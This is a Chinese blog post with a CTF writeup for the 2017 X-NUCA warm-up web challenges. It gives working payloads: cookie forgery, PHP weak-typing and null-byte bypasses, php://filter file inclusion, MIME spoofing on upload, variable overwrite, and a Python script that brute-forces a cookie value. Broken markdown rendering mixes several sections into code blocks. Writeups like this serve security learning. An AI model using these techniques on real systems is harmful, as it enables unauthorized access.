<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="utf-8">
  
  <title>[2017X-nuca] 赛前热身Writeup | Pr0ph3t</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="捉迷藏  * 题目url：http://218.76.35.75:20111/index.php  进去之后查看源码：   发现有隐藏链接:Index.php (Linux中对url大小写敏感) 手动输入后发现被跳转回来 于是在命令行使用curl工具逃逸跳转(curl默认不跟随跳转)     * Payload: http://218.76.35.75:20111/Index.php```1">
<meta name="keywords" content="CyberSecurity,old,writeup">
<meta property="og:type" content="article">
<meta property="og:title" content="[2017X-nuca] 赛前热身Writeup">
<meta property="og:url" content="https://blog.pr0ph3t.com/2017/08/14/2017X-nuca-赛前热身Writeup/index.html">
<meta property="og:site_name" content="Pr0ph3t">
<meta property="og:description" content="捉迷藏  * 题目url：http://218.76.35.75:20111/index.php  进去之后查看源码：   发现有隐藏链接:Index.php (Linux中对url大小写敏感) 手动输入后发现被跳转回来 于是在命令行使用curl工具逃逸跳转(curl默认不跟随跳转)     * Payload: http://218.76.35.75:20111/Index.php```1">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://upload-images.jianshu.io/upload_images/6949366-194c9c6133796162.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="http://upload-images.jianshu.io/upload_images/6949366-37ffc5378c57176f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="http://upload-images.jianshu.io/upload_images/6949366-0913f87ed90b7b09.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="http://upload-images.jianshu.io/upload_images/6949366-81d8ff0c5ac40b0b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="http://upload-images.jianshu.io/upload_images/6949366-e379645a43b6198e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="http://upload-images.jianshu.io/upload_images/6949366-675ebb166087b0d0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="http://upload-images.jianshu.io/upload_images/6949366-abcdbbb953d015e3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="http://upload-images.jianshu.io/upload_images/6949366-7822cac54a23df2a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="http://upload-images.jianshu.io/upload_images/6949366-c526426b2aa5db27.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="http://upload-images.jianshu.io/upload_images/6949366-8c0a4bb64daf5e30.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="http://upload-images.jianshu.io/upload_images/6949366-0960f036ee57ca55.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="http://upload-images.jianshu.io/upload_images/6949366-d3227d5a5506f4dc.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:updated_time" content="2019-07-06T09:54:46.953Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="[2017X-nuca] 赛前热身Writeup">
<meta name="twitter:description" content="捉迷藏  * 题目url：http://218.76.35.75:20111/index.php  进去之后查看源码：   发现有隐藏链接:Index.php (Linux中对url大小写敏感) 手动输入后发现被跳转回来 于是在命令行使用curl工具逃逸跳转(curl默认不跟随跳转)     * Payload: http://218.76.35.75:20111/Index.php```1">
<meta name="twitter:image" content="http://upload-images.jianshu.io/upload_images/6949366-194c9c6133796162.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
  
    <link rel="alternative" href="/atom.xml" title="Pr0ph3t" type="application/atom+xml">
  
  
    <link rel="icon" href="/img/favicon.png">
  
  
      <link rel="stylesheet" href="//cdn.bootcss.com/animate.css/3.5.0/animate.min.css">
  
  <link rel="stylesheet" href="/css/style.css">
  <link rel="stylesheet" href="/font-awesome/css/font-awesome.min.css">
  <link rel="apple-touch-icon" href="/apple-touch-icon.png">
  
  
      <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  
  <!-- 加载特效 -->
    <script src="/js/pace.js"></script>
    <link href="/css/pace/pace-theme-flash.css" rel="stylesheet">
  <script>
      var yiliaConfig = {
          rootUrl: '/',
          fancybox: true,
          animate: true,
          isHome: false,
          isPost: true,
          isArchive: false,
          isTag: false,
          isCategory: false,
          open_in_new: false
      }
  </script>
</head></html>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        <a href="/" class="profilepic">
            
            <img lazy-src="/img/head.webp" class="js-avatar">
            
        </a>

        <hgroup>
          <h1 class="header-author"><a href="/" title="Hi Mate">Pr0ph3t</a></h1>
        </hgroup>

        
        <p class="header-subtitle">菜菜菜</p>
        
        
        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        <div class="icon-wrap icon-link hide" data-idx="2">
                            <div class="loopback_l"></div>
                            <div class="loopback_r"></div>
                        </div>
                        
                        
                    </div>
                    
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>菜单</li>
                        <li>标签</li>
                        
                        <li>友情链接</li>
                        
                        
                    </ul>
                </div>
            </div>
        

        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a href="/">博客首页</a></li>
                        
                            <li><a href="/articles">文章</a></li>
                        
                            <li><a href="/about">关于我</a></li>
                        
                            <li><a href="/tags">tags</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fl mail" target="_blank" href="mailto://admin@pr0ph3t.com" title="mail">mail</a>
                            
                                <a class="fl github" target="_blank" href="https://github.com/Pr0phet" title="github">github</a>
                            
                        </ul>
                    </nav>
                </section>
                
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        <a href="/tags/Attack-Defense/" style="font-size: 12.5px;">Attack&Defense</a> <a href="/tags/CyberSecurity/" style="font-size: 20px;">CyberSecurity</a> <a href="/tags/crypto/" style="font-size: 10px;">crypto</a> <a href="/tags/hitcon/" style="font-size: 15px;">hitcon</a> <a href="/tags/old/" style="font-size: 20px;">old</a> <a href="/tags/writeup/" style="font-size: 17.5px;">writeup</a>
                    </div>
                </section>
                
                
                
                <section class="switch-part switch-part3">
                    <div id="js-friends">
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="https://aluvion.github.io">twings</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="https://blog.de1ta.club">De1ta</a>
                    
                    </div>
                </section>
                

                
            </div>
        </div>
    </header>                
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="Me">Pr0ph3t</a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                
                    <img lazy-src="/img/head.webp" class="js-avatar">
                
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="Me">Pr0ph3t</a></h1>
            </hgroup>
            
            <p class="header-subtitle">菜菜菜</p>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/">博客首页</a></li>
                
                    <li><a href="/articles">文章</a></li>
                
                    <li><a href="/about">关于我</a></li>
                
                    <li><a href="/tags">tags</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                <div class="social">
                    
                        <a class="mail" target="_blank" href="mailto://admin@pr0ph3t.com" title="mail">mail</a>
                    
                        <a class="github" target="_blank" href="https://github.com/Pr0phet" title="github">github</a>
                    
                </div>
            </nav>
        </header>                
    </div>
</nav>
      <div class="body-wrap"><article id="post-2017X-nuca-赛前热身Writeup" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2017/08/14/2017X-nuca-赛前热身Writeup/" class="article-date">
      <time datetime="2017-08-14T08:38:00.000Z" itemprop="datePublished">2017-08-14</time>
</a>
    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      [2017X-nuca] 赛前热身Writeup
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        

        
    <div class="article-tag tagcloud">
        <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/CyberSecurity/">CyberSecurity</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/old/">old</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/writeup/">writeup</a></li></ul>
    </div>

        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <h1 id="捉迷藏"><a href="#捉迷藏" class="headerlink" title="捉迷藏"></a>捉迷藏</h1><ul>
<li>题目url：<a href="http://218.76.35.75:20111/index.php" target="_blank" rel="noopener">http://218.76.35.75:20111/index.php</a></li>
</ul>
<p>进去之后查看源码：</p>
<p><img src="http://upload-images.jianshu.io/upload_images/6949366-194c9c6133796162.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="sourceCode"><br>发现有隐藏链接:Index.php (Linux中对url大小写敏感)<br>手动输入后发现被跳转回来<br>于是在命令行使用curl工具逃逸跳转(curl默认不跟随跳转)</p>
<p><img src="http://upload-images.jianshu.io/upload_images/6949366-37ffc5378c57176f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="poc"></p>
<ul>
<li><p>Payload: <figure class="highlight plain"><figcaption><span>http://218.76.35.75:20111/Index.php```</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"></span><br><span class="line">---------</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"># 简单的问答</span><br><span class="line">- 题目url：[http://218.76.35.75:20112](http://218.76.35.75:20112/)</span><br><span class="line">进去之后查看源代码发现题目全是扯淡</span><br><span class="line">源码截图如下：</span><br><span class="line"></span><br><span class="line">![sourceCode](http://upload-images.jianshu.io/upload_images/6949366-ac47bddc52338088.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)</span><br><span class="line">分析form后提交post（工具：HackBar）</span><br><span class="line">PS:后台估计是没有处理q4字段，直接处理q3字段了</span><br><span class="line"></span><br><span class="line">- Payload: </span><br><span class="line">  url -&gt; ```http://218.76.35.75:20112</span><br></pre></td></tr></table></figure></p>
<p>Post Field -&gt; <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">-------</span><br><span class="line"></span><br><span class="line"># 后台后台后台</span><br><span class="line">- 题目url：[http://218.76.35.75:20113/](http://218.76.35.75:20113/)</span><br><span class="line">进去之后只有一个Enter按钮可被操作，</span><br><span class="line">目的是获得admin权限</span><br><span class="line">观察到Response有新Cookie被set，</span><br><span class="line"></span><br><span class="line">![Cookie](http://upload-images.jianshu.io/upload_images/6949366-1ba02887ec9e941f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)</span><br><span class="line"></span><br><span class="line">Member疑似Base64，Decode后发现是Normal，猜测这是基于Cookie的Auth，直接在浏览器控制台修改Cookie后点击Enter后获得Flag。</span><br><span class="line"></span><br><span class="line">- Payload:</span><br><span class="line">  ```document.cookie=&quot;User=admin&quot;</span><br></pre></td></tr></table></figure></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">-------</span><br><span class="line"></span><br><span class="line"># PHP是最好的语言</span><br><span class="line">- 题目url：[http://218.76.35.75:20114](http://218.76.35.75:20114/)</span><br><span class="line">进去看到源码，白盒审计</span><br><span class="line">代码如下：</span><br><span class="line">```PHP</span><br><span class="line"> &lt;?php</span><br><span class="line">show_source(__FILE__);</span><br><span class="line">$v1=0;$v2=0;$v3=0;</span><br><span class="line">$a=(array)json_decode(@$_GET[&apos;foo&apos;]);</span><br><span class="line">if(is_array($a))&#123; //foo反序列化后必须为数组或者能强制转换为数组</span><br><span class="line">    is_numeric(@$a[&quot;bar1&quot;])?die(&quot;nope&quot;):NULL; //foo中包含一个k为bar1，v不能为数字的kv对</span><br><span class="line">    if(@$a[&quot;bar1&quot;])&#123;</span><br><span class="line">        ($a[&quot;bar1&quot;]&gt;2016)?$v1=1:NULL; </span><br><span class="line">        //此v必须大于2016，这里用到了PHP的一个弱类型特点，在PHP中，当&apos;2017aaaaabbbb&apos; 与数字2016比较时，PHP会尝试把前者转换成数字，故前者会被转换成2017，这与(int)&apos;2017asdadasd&apos; = 2017是符合的，看下面[图1]</span><br><span class="line">    &#125;</span><br><span class="line">    if(is_array(@$a[&quot;bar2&quot;]))&#123; //foo中必须含有一个k为bar2，v为数组的kv对</span><br><span class="line">        if(count($a[&quot;bar2&quot;])!==5 OR !is_array($a[&quot;bar2&quot;][0])) die(&quot;nope&quot;);</span><br><span class="line">        //bar2的v中的数组元素必须等于5个，并且第一个元素必须还是为数组</span><br><span class="line">        $pos = array_search(&quot;nudt&quot;, $a[&quot;a2&quot;]);</span><br><span class="line">        $pos===false?die(&quot;nope&quot;):NULL;</span><br><span class="line">        //foo中必须包含一个k为a2，v为nudt的kv对（我觉得出题人这里是想出成bar2中必须包含一个v为nudt的kv对）</span><br><span class="line">        foreach($a[&quot;bar2&quot;] as $key=&gt;$val)&#123;</span><br><span class="line">            $val===&quot;nudt&quot;?die(&quot;nope&quot;):NULL;</span><br><span class="line">            //bar2里面的元素不允许包含nudt字符串</span><br><span class="line">        &#125;</span><br><span class="line">        $v2=1;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">$c=@$_GET[&apos;cat&apos;];</span><br><span class="line">$d=@$_GET[&apos;dog&apos;];</span><br><span class="line">if(@$c[1])&#123;</span><br><span class="line">    if(!strcmp($c[1],$d) &amp;&amp; $c[1]!==$d)&#123;</span><br><span class="line">        eregi(&quot;3|1|c&quot;,$d.$c[0])?die(&quot;nope&quot;):NULL;</span><br><span class="line">        strpos(($c[0].$d), &quot;htctf2016&quot;)?$v3=1:NULL;</span><br><span class="line">        //这里利用了eregi会被%00截断的特点构造payload绕过检测</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">if($v1 &amp;&amp; $v2 &amp;&amp; $v3)&#123;</span><br><span class="line">    include &quot;flag.php&quot;;</span><br><span class="line">    echo $flag;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
</li>
<li><p>Payload:<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"></span><br><span class="line">![图1](http://upload-images.jianshu.io/upload_images/6949366-be8b269a05e4d8c8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)</span><br><span class="line"></span><br><span class="line">--------</span><br><span class="line"></span><br><span class="line"># Login</span><br><span class="line">- 题目url：[http://218.76.35.75:20115/](http://218.76.35.75:20115/)</span><br><span class="line">进去之后随便点点观察到Url为?page=xxx，很有可能是文件包含，直接试一波php伪协议, ```php://filter/convert.base64-encode/resource=main```发现可以，遂读取页面源码</span><br><span class="line">----------- index.php ----------</span><br><span class="line">```php</span><br><span class="line">&lt;?php</span><br><span class="line">$pwhash=&quot;ffd313052dab00927cb61064a392f30ee454e70f&quot;;</span><br><span class="line"></span><br><span class="line">if (@$_GET[&apos;log&apos;]) &#123;</span><br><span class="line">	if(file_exists($_GET[&apos;log&apos;].&quot;.log&quot;))&#123;</span><br><span class="line">		include(&quot;flag.txt&quot;);</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br><span class="line">if(@$_GET[&apos;page&apos;] != &apos;index&apos;)&#123;</span><br><span class="line">	include((@$_GET[&apos;page&apos;]?$_GET[&apos;page&apos;].&quot;.php&quot;:&quot;main.php&quot;));</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure></p>
</li>
</ul>
<p>———– main.php ———-</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">title</span>&gt;</span>trolol<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">center</span>&gt;</span></span><br><span class="line">			<span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">"./?page=main"</span>&gt;</span>main<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br><span class="line">			<span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">"./?page=info"</span>&gt;</span>server info<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br><span class="line">			<span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">"./?page=login"</span>&gt;</span>login<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;/<span class="name">center</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br><span class="line">``` </span><br><span class="line"></span><br><span class="line">----------- login.php ------------</span><br><span class="line">```php</span><br><span class="line"><span class="php"><span class="meta">&lt;?php</span></span></span><br><span class="line"><span class="php">$login=@$_POST[<span class="string">'login'</span>];</span></span><br><span class="line"><span class="php">$password=@$_POST[<span class="string">'password'</span>];</span></span><br><span class="line"><span class="php"><span class="keyword">if</span>(@$login==<span class="string">"admin"</span> &amp;&amp; sha1(@$password)==$pwhash)&#123;</span></span><br><span class="line"><span class="php">	<span class="keyword">include</span>(<span class="string">'flag.txt'</span>);</span></span><br><span class="line"><span class="php">&#125;<span class="keyword">else</span> <span class="keyword">if</span> (@$login&amp;&amp;@$password&amp;&amp;@$_GET[<span class="string">'debug'</span>]) &#123;</span></span><br><span class="line"><span class="php">	<span class="keyword">echo</span> <span class="string">"Login error, login credentials has been saved to ./log/"</span>.htmlentities($login).<span class="string">".log"</span>;</span></span><br><span class="line"><span class="php">	$logfile = <span class="string">"./log/"</span>.$login.<span class="string">".log"</span>;</span></span><br><span class="line"><span class="php">	file_put_contents($logfile, $login.<span class="string">"\n"</span>.$password);</span></span><br><span class="line"><span class="php">&#125; </span></span><br><span class="line"><span class="php"><span class="meta">?&gt;</span></span></span><br><span class="line">	<span class="tag">&lt;<span class="name">center</span>&gt;</span></span><br><span class="line">		login<span class="tag">&lt;<span class="name">br</span>/&gt;</span><span class="tag">&lt;<span class="name">br</span>/&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">form</span> <span class="attr">action</span>=<span class="string">""</span> <span class="attr">method</span>=<span class="string">"POST"</span>&gt;</span></span><br><span class="line">			<span class="tag">&lt;<span class="name">input</span> <span class="attr">name</span>=<span class="string">"login"</span> <span class="attr">placeholder</span>=<span class="string">"login"</span>&gt;</span><span class="tag">&lt;<span class="name">br</span>/&gt;</span></span><br><span class="line">			<span class="tag">&lt;<span class="name">input</span> <span class="attr">name</span>=<span class="string">"password"</span> <span class="attr">placeholder</span>=<span class="string">"password"</span>&gt;</span><span class="tag">&lt;<span class="name">br</span>/&gt;</span><span class="tag">&lt;<span class="name">br</span>/&gt;</span></span><br><span class="line">			<span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"submit"</span> <span class="attr">value</span>=<span class="string">"Go!"</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;/<span class="name">form</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;/<span class="name">center</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>这一题比较迷。。因为题目逻辑貌似是直接随便包含一个log文件就能出flag。。<br>基本思路是，登陆带debug生成log然后在index.php里发log的参数。。<br>但是其实这一题估计是出题人改崩了。。。<br>王师傅有更6的解题思路。。。(我觉得这应该是正确的)。。<br>详情请移步<a href="http://www.jianshu.com/p/fd9f38753078" target="_blank" rel="noopener">http://www.jianshu.com/p/fd9f38753078</a></p>
<hr>
<h1 id="简单的文件上传"><a href="#简单的文件上传" class="headerlink" title="简单的文件上传"></a>简单的文件上传</h1><ul>
<li>题目url：<a href="http://218.76.35.75:20122/" target="_blank" rel="noopener">http://218.76.35.75:20122</a><br>中规中矩的上传检测，后台检测后缀和MIME类型，要求是php后缀并且MIME是jpg，直接F12截包修改MIME得到flag</li>
</ul>
<hr>
<h1 id="简单的JS"><a href="#简单的JS" class="headerlink" title="简单的JS"></a>简单的JS</h1><ul>
<li>题目url：<a href="http://218.76.35.75:20123/" target="_blank" rel="noopener">http://218.76.35.75:20123</a><br>打开页面有提示<figure class="highlight plain"><figcaption><span>evil url is the passkey```，查看源码有</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">```javascript</span><br><span class="line">&lt;script&gt; </span><br><span class="line">p=&quot;60,105,102,114,97,109,101,32,104,101,105,103,104,116,61,48,32,119,105,100,116,104,61,48,32,115,114,99,61,34,46,47,102,108,48,97,46,112,104,112,34,62&quot;</span><br><span class="line">p=eval(&quot;String.fromCharCode(&quot;+p+&quot;)&quot;); </span><br><span class="line">document.write(p);</span><br><span class="line">&lt;/script&gt;</span><br></pre></td></tr></table></figure></li>
</ul>
<p>在控制台解码后为</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">iframe</span> <span class="attr">height</span>=<span class="string">0</span> <span class="attr">width</span>=<span class="string">0</span> <span class="attr">src</span>=<span class="string">"./fl0a.php"</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>访问<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">-------</span><br><span class="line"></span><br><span class="line"># PHP是一门松散的语言</span><br><span class="line">- 题目url：[http://218.76.35.75:20124](http://218.76.35.75:20124/)</span><br><span class="line">打开页面有源码提示，发现存在parse_str可以变量覆盖，直接上payload。</span><br><span class="line"></span><br><span class="line">- Payload:http://218.76.35.75:20124/?heetian=he=abcd</span><br><span class="line"></span><br><span class="line">-------</span><br><span class="line"></span><br><span class="line"># 简单的文件包含</span><br><span class="line">- 题目url：[http://218.76.35.75:20126](http://218.76.35.75:20126/)</span><br><span class="line">题目描述是：flag在/flag里</span><br><span class="line">打开页面随便点开一个page发现url疑似包含，伪协议不能用，所以根据题目描述把参数改成?page=/flag后在源码中可以得到下一个文件的名字，访问那个文件得到flag</span><br><span class="line"></span><br><span class="line">------</span><br><span class="line"></span><br><span class="line"># 简单的验证</span><br><span class="line">- 题目url：[http://218.76.35.75:20127](http://218.76.35.75:20127/)</span><br><span class="line">根据题目描述得知我们要变成admin才有权限看flag</span><br><span class="line">页面并没有啥有用信息，查看cookie得到user和guess，看来又是一题基于cookie的Auth，因为是guess，所以可以猜到是爆破，直接上脚本：</span><br><span class="line">```python</span><br><span class="line">#coding:utf8</span><br><span class="line">import requests</span><br><span class="line"></span><br><span class="line">se = requests.Session()</span><br><span class="line"></span><br><span class="line"># -------- 简单的验证</span><br><span class="line">for x in xrange(0,1000):</span><br><span class="line">	res = se.get(&apos;http://218.76.35.75:20127/index.php&apos;,cookies=&#123;&apos;user&apos;:&apos;admin&apos;,&apos;guess&apos;:&apos;%d&apos; % x&#125;)</span><br><span class="line">	print &apos;[*] Trying &apos; + str(x)</span><br><span class="line">	if &apos;not&apos; not in res.content:</span><br><span class="line">		print &apos;[*] The guess num is &apos; + str(x)</span><br><span class="line">		print &apos;[*] Content----------&apos;</span><br><span class="line">		print res.content</span><br><span class="line">		exit()</span><br></pre></td></tr></table></figure></p>
<p><img src="http://upload-images.jianshu.io/upload_images/6949366-0913f87ed90b7b09.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="poc"></p>
<hr>
<h1 id="GG"><a href="#GG" class="headerlink" title="GG"></a>GG</h1><ul>
<li>题目url：<a href="http://218.76.35.75:65380/" target="_blank" rel="noopener">http://218.76.35.75:65380/</a><br>进去以后是一个俄罗斯方块（我还玩了一下233333）<br>玩的过程中并没有在请求里面发现于后台的交互，这是前端题？<br>查看美化后的JS，发现有个地方比较奇怪</li>
</ul>
<p><img src="http://upload-images.jianshu.io/upload_images/6949366-81d8ff0c5ac40b0b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="奇怪的地方"></p>
<p>这里貌似是明示了一个js文件，名字是e100.js<br>访问一下发现是久违的jsFuck，直接丢进控制台就alert出flag了</p>
<hr>
<h1 id="Reappear"><a href="#Reappear" class="headerlink" title="Reappear"></a>Reappear</h1><ul>
<li>题目url：<a href="http://218.76.35.75:65180/" target="_blank" rel="noopener">http://218.76.35.75:65180/</a><br>进去以后发现是kindeditor，访问有文件遍历漏洞的php发现能用，看到attached文件夹下有flag_clue.php，访问之后发现疑似倒着的base64，python切片走一波，得到结果再base64解码后出flag</li>
</ul>
<p><img src="http://upload-images.jianshu.io/upload_images/6949366-e379645a43b6198e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="poc"></p>
<ul>
